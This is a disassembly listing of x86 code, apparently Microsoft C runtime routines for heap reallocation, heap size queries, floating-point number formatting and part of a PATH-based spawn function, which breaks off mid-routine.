; =============== S U B R O U T I N E =======================================
sub_4285A0 proc near ; CODE XREF: sub_42319C+1�p
; sub_4284FB+1�p
push 0Dh
call sub_428436
pop ecx
retn
sub_4285A0 endp
; =============== S U B R O U T I N E =======================================
sub_4285A9 proc near ; CODE XREF: sub_42319C:loc_423211�p
; sub_4284FB+8C�p
push 0Dh
call sub_428497
pop ecx
retn
sub_4285A9 endp
; =============== S U B R O U T I N E =======================================
sub_4285B2 proc near ; CODE XREF: sub_4284AC+15�p
; sub_4284AC+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_4285B7: ; CODE XREF: sub_4285B2+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_4285CA
mov eax, [esi]
test eax, eax
jz short loc_4285C5
call eax
loc_4285C5: ; CODE XREF: sub_4285B2+F�j
add esi, 4
jmp short loc_4285B7
; ---------------------------------------------------------------------------
loc_4285CA: ; CODE XREF: sub_4285B2+9�j
pop esi
retn
sub_4285B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4285CC proc near ; CODE XREF: sub_42319C+39�p
; sub_42E568+ED�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00428760 SIZE 0000013F BYTES
; FUNCTION CHUNK AT 004288B0 SIZE 0000004B BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F508
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 28h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
jnz short loc_428606
push [ebp+arg_4]
call sub_422F79
pop ecx
jmp loc_4288EC
; ---------------------------------------------------------------------------
loc_428606: ; CODE XREF: sub_4285CC+2A�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_428619
push ebx
call sub_4230B3
pop ecx
jmp loc_4288EA
; ---------------------------------------------------------------------------
loc_428619: ; CODE XREF: sub_4285CC+3F�j
mov eax, dword_6319C0
cmp eax, 3
jnz loc_428760
loc_428627: ; CODE XREF: sub_4285CC+178�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_428724
push 9
call sub_428436
pop ecx
mov [ebp+var_4], edi
push ebx
call sub_427241
pop ecx
mov [ebp+var_28], eax
cmp eax, edi
jz loc_4286F4
cmp esi, dword_6319B8
ja short loc_4286A4
push esi
push ebx
push eax
call sub_427A4A
add esp, 0Ch
test eax, eax
jz short loc_42866C
mov [ebp+var_24], ebx
jmp short loc_4286A4
; ---------------------------------------------------------------------------
loc_42866C: ; CODE XREF: sub_4285CC+99�j
push esi
call sub_427595
pop ecx
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_4286A4
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_428687
mov eax, esi
loc_428687: ; CODE XREF: sub_4285CC+B7�j
push eax
push ebx
push [ebp+var_24]
call sub_4223F0
push ebx
call sub_427241
mov [ebp+var_28], eax
push ebx
push eax
call sub_42726C
add esp, 18h
loc_4286A4: ; CODE XREF: sub_4285CC+8A�j
; sub_4285CC+9E�j ...
cmp [ebp+var_24], edi
jnz short loc_4286F4
cmp esi, edi
jnz short loc_4286B3
push 1
pop esi
mov [ebp+arg_4], esi
loc_4286B3: ; CODE XREF: sub_4285CC+DF�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
mov [ebp+var_24], eax
cmp eax, edi
jz short loc_4286F4
mov eax, [ebx-4]
dec eax
mov [ebp+var_20], eax
cmp eax, esi
jb short loc_4286DE
mov eax, esi
loc_4286DE: ; CODE XREF: sub_4285CC+10E�j
push eax
push ebx
push [ebp+var_24]
call sub_4223F0
push ebx
push [ebp+var_28]
call sub_42726C
add esp, 14h
loc_4286F4: ; CODE XREF: sub_4285CC+7E�j
; sub_4285CC+DB�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_428757
cmp [ebp+var_28], edi
jnz short loc_428724
cmp esi, edi
jnz short loc_428709
push 1
pop esi
loc_428709: ; CODE XREF: sub_4285CC+138�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push edi
push dword_6319BC
call dword_42F1B4 ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_428724: ; CODE XREF: sub_4285CC+61�j
; sub_4285CC+134�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz loc_4288EC
cmp dword_6313F8, edi
jz loc_4288EC
push esi
call sub_42700C
pop ecx
test eax, eax
jnz loc_428627
jmp loc_4288EA
sub_4285CC endp
; =============== S U B R O U T I N E =======================================
sub_42874F proc near ; DATA XREF: .text:0042F510�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
xor edi, edi
sub_42874F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428757 proc near ; CODE XREF: sub_4285CC+12C�p
push 9
call sub_428497
pop ecx
retn
sub_428757 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4285CC
loc_428760: ; CODE XREF: sub_4285CC+55�j
cmp eax, 2
jnz loc_4288B0
cmp esi, 0FFFFFFE0h
ja short loc_428780
cmp esi, edi
jbe short loc_42877A
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_42877D
; ---------------------------------------------------------------------------
loc_42877A: ; CODE XREF: sub_4285CC+1A4�j
push 10h
pop esi
loc_42877D: ; CODE XREF: sub_4285CC+1AC�j
mov [ebp+arg_4], esi
loc_428780: ; CODE XREF: sub_4285CC+1A0�j
; sub_4285CC+2CB�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_42887F
push 9
call sub_428436
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_38]
push eax
push ebx
call sub_427F9C
add esp, 0Ch
mov edi, eax
mov [ebp+var_30], edi
test edi, edi
jz loc_428863
cmp esi, dword_44BA9C
jnb short loc_42881D
mov ebx, esi
shr ebx, 4
push ebx
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_428364
add esp, 10h
test eax, eax
jz short loc_4287E2
mov eax, [ebp+arg_0]
mov [ebp+var_24], eax
jmp short loc_42881A
; ---------------------------------------------------------------------------
loc_4287E2: ; CODE XREF: sub_4285CC+20C�j
push ebx
call sub_428038
pop ecx
mov [ebp+var_24], eax
test eax, eax
jz short loc_42881A
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_4287FF
mov eax, esi
loc_4287FF: ; CODE XREF: sub_4285CC+22F�j
push eax
push [ebp+arg_0]
push [ebp+var_24]
call sub_4223F0
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_427FF3
add esp, 18h
loc_42881A: ; CODE XREF: sub_4285CC+214�j
; sub_4285CC+222�j
mov ebx, [ebp+arg_0]
loc_42881D: ; CODE XREF: sub_4285CC+1F3�j
cmp [ebp+var_24], 0
jnz short loc_428876
push esi
push 0
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
mov [ebp+var_24], eax
test eax, eax
jz short loc_428876
movzx eax, byte ptr [edi]
shl eax, 4
mov [ebp+var_34], eax
cmp eax, esi
jb short loc_428848
mov eax, esi
loc_428848: ; CODE XREF: sub_4285CC+278�j
push eax
push ebx
push [ebp+var_24]
call sub_4223F0
push edi
push [ebp+var_2C]
push [ebp+var_38]
call sub_427FF3
add esp, 18h
jmp short loc_428876
; ---------------------------------------------------------------------------
loc_428863: ; CODE XREF: sub_4285CC+1E7�j
push esi
push ebx
push 0
push dword_6319BC
call dword_42F1B4 ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_428876: ; CODE XREF: sub_4285CC+255�j
; sub_4285CC+26B�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4288A5
loc_42887F: ; CODE XREF: sub_4285CC+1BA�j
mov eax, [ebp+var_24]
cmp eax, edi
jnz short loc_4288EC
cmp dword_6313F8, edi
jz short loc_4288EC
push esi
call sub_42700C
pop ecx
test eax, eax
jnz loc_428780
jmp short loc_4288EA
; END OF FUNCTION CHUNK FOR sub_4285CC
; =============== S U B R O U T I N E =======================================
sub_42889F proc near ; DATA XREF: .text:0042F51C�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_42889F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4288A5 proc near ; CODE XREF: sub_4285CC+2AE�p
push 9
call sub_428497
pop ecx
xor edi, edi
retn
sub_4288A5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4285CC
loc_4288B0: ; CODE XREF: sub_4285CC+197�j
; sub_4285CC+31C�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4288D3
cmp esi, edi
jnz short loc_4288BE
push 1
pop esi
loc_4288BE: ; CODE XREF: sub_4285CC+2ED�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push ebx
push edi
push dword_6319BC
call dword_42F1B4 ; RtlReAllocateHeap
loc_4288D3: ; CODE XREF: sub_4285CC+2E9�j
cmp eax, edi
jnz short loc_4288EC
cmp dword_6313F8, edi
jz short loc_4288EC
push esi
call sub_42700C
pop ecx
test eax, eax
jnz short loc_4288B0
loc_4288EA: ; CODE XREF: sub_4285CC+48�j
; sub_4285CC+17E�j ...
xor eax, eax
loc_4288EC: ; CODE XREF: sub_4285CC+35�j
; sub_4285CC+15D�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4285CC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4288FB proc near ; CODE XREF: sub_42319C+C�p
; sub_42319C+2A�p
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042896E SIZE 0000006F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F520
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, dword_6319C0
cmp eax, 3
jnz short loc_42896E
push 9
call sub_428436
pop ecx
and [ebp+var_4], 0
mov esi, [ebp+arg_0]
push esi
call sub_427241
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_428950
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_428953
; ---------------------------------------------------------------------------
loc_428950: ; CODE XREF: sub_4288FB+48�j
mov esi, [ebp+var_20]
loc_428953: ; CODE XREF: sub_4288FB+53�j
or [ebp+var_4], 0FFFFFFFFh
call sub_428965
cmp [ebp+var_1C], 0
jmp short loc_4289B7
sub_4288FB endp
; =============== S U B R O U T I N E =======================================
sub_428962 proc near ; DATA XREF: .text:0042F528�o
mov esi, [ebp-20h]
sub_428962 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428965 proc near ; CODE XREF: sub_4288FB+5C�p
push 9
call sub_428497
pop ecx
retn
sub_428965 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FB
loc_42896E: ; CODE XREF: sub_4288FB+2B�j
cmp eax, 2
jnz short loc_4289B9
push 9
call sub_428436
pop ecx
mov [ebp+var_4], 1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_0]
call sub_427F9C
add esp, 0Ch
mov [ebp+var_28], eax
test eax, eax
jz short loc_4289A7
movzx esi, byte ptr [eax]
shl esi, 4
mov [ebp+var_20], esi
jmp short loc_4289AA
; ---------------------------------------------------------------------------
loc_4289A7: ; CODE XREF: sub_4288FB+9F�j
mov esi, [ebp+var_20]
loc_4289AA: ; CODE XREF: sub_4288FB+AA�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4289E0
cmp [ebp+var_28], 0
loc_4289B7: ; CODE XREF: sub_4288FB+65�j
jnz short loc_4289CC
loc_4289B9: ; CODE XREF: sub_4288FB+76�j
push [ebp+arg_0]
push 0
push dword_6319BC
call dword_42F1AC ; RtlSizeHeap
mov esi, eax
loc_4289CC: ; CODE XREF: sub_4288FB:loc_4289B7�j
mov eax, esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4288FB
; =============== S U B R O U T I N E =======================================
sub_4289DD proc near ; DATA XREF: .text:0042F534�o
mov esi, [ebp-20h]
sub_4289DD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4289E0 proc near ; CODE XREF: sub_4288FB+B3�p
push 9
call sub_428497
pop ecx
retn
sub_4289E0 endp
; =============== S U B R O U T I N E =======================================
sub_4289E9 proc near ; CODE XREF: sub_42346C+F�p
push 30000h
push 10000h
call sub_42C29E
pop ecx
pop ecx
retn
sub_4289E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4289FB proc near ; CODE XREF: sub_428A39:loc_428A5D�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_42F540
fstp [ebp+var_8]
fld dbl_42F538
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_42F450
fnstsw ax
sahf
jbe short loc_428A35
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_428A35: ; CODE XREF: sub_4289FB+33�j
xor eax, eax
leave
retn
sub_4289FB endp
; =============== S U B R O U T I N E =======================================
sub_428A39 proc near ; CODE XREF: sub_42346C+5�p
push offset aKernel32 ; "KERNEL32"
call dword_42F074 ; GetModuleHandleA
test eax, eax
jz short loc_428A5D
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_42F13C ; GetProcAddress
test eax, eax
jz short loc_428A5D
push 0
call eax ; sub_42346C
retn
; ---------------------------------------------------------------------------
loc_428A5D: ; CODE XREF: sub_428A39+D�j
; sub_428A39+1D�j
jmp sub_4289FB
sub_428A39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428A62 proc near ; CODE XREF: sub_42512C+3CB�p
; DATA XREF: sub_423484+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_42A731
cmp eax, 65h
pop ecx
jz short loc_428AA2
loc_428A76: ; CODE XREF: sub_428A62+3E�j
inc esi
cmp dword_449A44, 1
jle short loc_428A8F
movsx eax, byte ptr [esi]
push 4
push eax
call sub_42653A
pop ecx
pop ecx
jmp short loc_428A9E
; ---------------------------------------------------------------------------
loc_428A8F: ; CODE XREF: sub_428A62+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_449838
mov al, [ecx+eax*2]
and eax, 4
loc_428A9E: ; CODE XREF: sub_428A62+2B�j
test eax, eax
jnz short loc_428A76
loc_428AA2: ; CODE XREF: sub_428A62+12�j
mov cl, byte_449A48
mov al, [esi]
mov [esi], cl
inc esi
loc_428AAD: ; CODE XREF: sub_428A62+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_428AAD
pop esi
retn
sub_428A62 endp
; =============== S U B R O U T I N E =======================================
sub_428ABC proc near ; CODE XREF: sub_42512C+3E2�p
; DATA XREF: sub_423484+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_449A48
mov cl, [eax]
test cl, cl
jz short loc_428AD8
loc_428ACC: ; CODE XREF: sub_428ABC+1A�j
cmp cl, dl
jz short loc_428AD8
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_428ACC
loc_428AD8: ; CODE XREF: sub_428ABC+E�j
; sub_428ABC+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_428B09
loc_428ADF: ; CODE XREF: sub_428ABC+34�j
mov cl, [eax]
test cl, cl
jz short loc_428AF2
cmp cl, 65h
jz short loc_428AF2
cmp cl, 45h
jz short loc_428AF2
inc eax
jmp short loc_428ADF
; ---------------------------------------------------------------------------
loc_428AF2: ; CODE XREF: sub_428ABC+27�j
; sub_428ABC+2C�j ...
mov ecx, eax
loc_428AF4: ; CODE XREF: sub_428ABC+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_428AF4
cmp [eax], dl
jnz short loc_428AFF
dec eax
loc_428AFF: ; CODE XREF: sub_428ABC+40�j
; sub_428ABC+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_428AFF
locret_428B09: ; CODE XREF: sub_428ABC+21�j
retn
sub_428ABC endp
; =============== S U B R O U T I N E =======================================
sub_428B0A proc near ; DATA XREF: sub_423484+28�o
; .text:off_44BB70�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_42F570
fnstsw ax
sahf
jb short loc_428B1F
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_428B1F: ; CODE XREF: sub_428B0A+F�j
xor eax, eax
retn
sub_428B0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428B22 proc near ; CODE XREF: sub_425A04+430�p
; DATA XREF: sub_423484+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_428B4B
lea eax, [ebp+var_8]
push eax
call sub_42C761
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_428B4B: ; CODE XREF: sub_428B22+C�j
lea eax, [ebp+arg_8]
push eax
call sub_42C78E
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_428B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428B60 proc near ; CODE XREF: sub_428E12+47�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_42C832
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov edx, [ebp+arg_4]
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_42C7BB
lea eax, [ebp+var_10]
push 0
push eax
push [ebp+arg_C]
push esi
push [ebp+arg_4]
call sub_428BC1
mov eax, [ebp+arg_4]
add esp, 30h
pop esi
leave
retn
sub_428B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428BC1 proc near ; CODE XREF: sub_428B60+53�p
; sub_428D7F+86�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_10], bl
push esi
mov esi, [ebp+arg_C]
push edi
mov edi, [ebp+arg_0]
jz short loc_428BEF
xor eax, eax
cmp [ebp+arg_4], ebx
setnle al
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, edi
push eax
call sub_428E63
pop ecx
pop ecx
loc_428BEF: ; CODE XREF: sub_428BC1+11�j
cmp dword ptr [esi], 2Dh
mov eax, edi
jnz short loc_428BFC
mov byte ptr [edi], 2Dh
lea eax, [edi+1]
loc_428BFC: ; CODE XREF: sub_428BC1+33�j
cmp [ebp+arg_4], ebx
jle short loc_428C13
mov dl, [eax+1]
lea ecx, [eax+1]
mov [eax], dl
mov eax, ecx
mov cl, byte_449A48
mov [eax], cl
loc_428C13: ; CODE XREF: sub_428BC1+3E�j
xor ecx, ecx
cmp [ebp+arg_10], bl
push offset aE000 ; "e+000"
setz cl
add ecx, eax
add ecx, [ebp+arg_4]
push ecx
call sub_423260
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
mov ecx, eax
jz short loc_428C37
mov byte ptr [ecx], 45h
loc_428C37: ; CODE XREF: sub_428BC1+71�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_428C7C
mov ebx, [esi+4]
dec ebx
jns short loc_428C4B
neg ebx
mov byte ptr [ecx], 2Dh
loc_428C4B: ; CODE XREF: sub_428BC1+83�j
inc ecx
cmp ebx, 64h
jl short loc_428C62
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_428C62: ; CODE XREF: sub_428BC1+8E�j
inc ecx
cmp ebx, 0Ah
jl short loc_428C79
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_428C79: ; CODE XREF: sub_428BC1+A5�j
add [ecx+1], bl
loc_428C7C: ; CODE XREF: sub_428BC1+7D�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_428BC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428C83 proc near ; CODE XREF: sub_428E12+1E�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_42C832
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_42C7BB
lea eax, [ebp+var_10]
push 0
push eax
push esi
push [ebp+arg_4]
call sub_428CD8
mov eax, [ebp+arg_4]
add esp, 2Ch
pop esi
leave
retn
sub_428C83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428CD8 proc near ; CODE XREF: sub_428C83+47�p
; sub_428D7F+6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
push edi
mov eax, [esi+4]
dec eax
cmp [ebp+arg_C], 0
jz short loc_428D08
cmp eax, [ebp+arg_4]
jnz short loc_428D08
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebx
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_428D08: ; CODE XREF: sub_428CD8+14�j
; sub_428CD8+19�j
cmp dword ptr [esi], 2Dh
mov edi, ebx
jnz short loc_428D15
mov byte ptr [ebx], 2Dh
lea edi, [ebx+1]
loc_428D15: ; CODE XREF: sub_428CD8+35�j
mov eax, [esi+4]
test eax, eax
jg short loc_428D2C
push 1
push edi
call sub_428E63
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_428D2E
; ---------------------------------------------------------------------------
loc_428D2C: ; CODE XREF: sub_428CD8+42�j
add edi, eax
loc_428D2E: ; CODE XREF: sub_428CD8+52�j
cmp [ebp+arg_4], 0
jle short loc_428D78
push 1
push edi
call sub_428E63
mov al, byte_449A48
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_428D78
cmp [ebp+arg_C], 0
jz short loc_428D57
neg esi
jmp short loc_428D5E
; ---------------------------------------------------------------------------
loc_428D57: ; CODE XREF: sub_428CD8+79�j
neg esi
cmp [ebp+arg_4], esi
jl short loc_428D61
loc_428D5E: ; CODE XREF: sub_428CD8+7D�j
mov [ebp+arg_4], esi
loc_428D61: ; CODE XREF: sub_428CD8+84�j
push [ebp+arg_4]
push edi
call sub_428E63
push [ebp+arg_4]
push 30h
push edi
call sub_4221F0
add esp, 14h
loc_428D78: ; CODE XREF: sub_428CD8+5A�j
; sub_428CD8+73�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_428CD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428D7F proc near ; CODE XREF: sub_428E12+34�p
var_44 = qword ptr -44h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+44h+var_44]
call sub_42C832
mov eax, [ebp+var_C]
mov ebx, [ebp+arg_8]
lea esi, [eax-1]
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push edi
call sub_42C7BB
mov eax, [ebp+var_C]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_428DF8
cmp eax, ebx
jge short loc_428DF8
test cl, cl
jz short loc_428DE4
loc_428DDA: ; CODE XREF: sub_428D7F+60�j
mov al, [edi]
inc edi
test al, al
jnz short loc_428DDA
and [edi-2], al
loc_428DE4: ; CODE XREF: sub_428D7F+59�j
lea eax, [ebp+var_10]
push 1
push eax
push ebx
push [ebp+arg_4]
call sub_428CD8
add esp, 10h
jmp short loc_428E0D
; ---------------------------------------------------------------------------
loc_428DF8: ; CODE XREF: sub_428D7F+51�j
; sub_428D7F+55�j
lea eax, [ebp+var_10]
push 1
push eax
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
call sub_428BC1
add esp, 14h
loc_428E0D: ; CODE XREF: sub_428D7F+77�j
pop edi
pop esi
pop ebx
leave
retn
sub_428D7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428E12 proc near ; CODE XREF: sub_42512C+3AA�p
; DATA XREF: sub_423484�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_428E4D
cmp [ebp+arg_8], 45h
jz short loc_428E4D
cmp [ebp+arg_8], 66h
jnz short loc_428E3A
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_428C83
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_428E3A: ; CODE XREF: sub_428E12+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_428D7F
jmp short loc_428E5E
; ---------------------------------------------------------------------------
loc_428E4D: ; CODE XREF: sub_428E12+7�j
; sub_428E12+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_428B60
loc_428E5E: ; CODE XREF: sub_428E12+39�j
add esp, 10h
pop ebp
retn
sub_428E12 endp
; =============== S U B R O U T I N E =======================================
sub_428E63 proc near ; CODE XREF: sub_428BC1+27�p
; sub_428CD8+47�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_428E86
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_422120
inc eax
push eax
push esi
add esi, edi
push esi
call sub_423C20
add esp, 10h
pop esi
loc_428E86: ; CODE XREF: sub_428E63+7�j
pop edi
retn
sub_428E63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428E88 proc near ; CODE XREF: sub_423517+96�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_428FED
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_428FE6
call sub_426528
cmp dword ptr [eax], 2
jnz loc_428FE6
push 2Fh
push [ebp+arg_4]
call sub_42CA33
pop ecx
test eax, eax
pop ecx
jnz loc_428FE6
push offset aPath_0 ; "PATH"
call sub_429187
mov edi, eax
pop ecx
test edi, edi
jz loc_428FE6
